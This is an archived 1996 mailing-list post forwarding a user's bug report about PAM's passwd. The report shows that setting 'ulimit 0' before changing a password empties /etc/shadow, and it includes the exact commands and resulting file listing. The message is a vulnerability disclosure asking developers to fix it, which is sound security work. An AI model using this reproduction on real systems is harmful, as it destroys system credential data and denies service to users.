[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

passwd module attack...

This isn't too hard to deal with in the passwd module; does someone
want to deal with this before .53 is released?

Also, should the framework protect against attacks like this and
thereby make it easier to write modules?


------- Forwarded Message

From: Cedric Maion <cmaion@I209-b.resI.insa-lyon.fr>
To: "'johnsonm@redhat.com'" <johnsonm@redhat.com>
Subject: Denial of service attack with passwd !
Date: Sun, 6 Oct 1996 02:54:45 +0100


I'm using PAM and shadow-utils on my Linux box. Great. That's pretty =
cool, but....
It's sounds terrible, but everybody could easily zeros my /etc/shadow =
file... !!!!

All you need is to type :

$ ulimit 0
$ passwd
New passsword:
New password (again):
Password changed
passwd: all authentification tokens updated successfully

Then :
$ ls -al /etc/shadow
- -r--------   1 root            0 Oct   6 02:37 shadow

Argh !  :-(

I send this to you, because I do not really know where I should post =
this, but I think it may be linked with PAM (or at least with passwd).

Could you contact the right person ?

Thanks in advance !

       Cedric Maion

- --
Cedric Maion


Email : =20
   -- PGP public key available --

------- End of Forwarded Message

[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index] []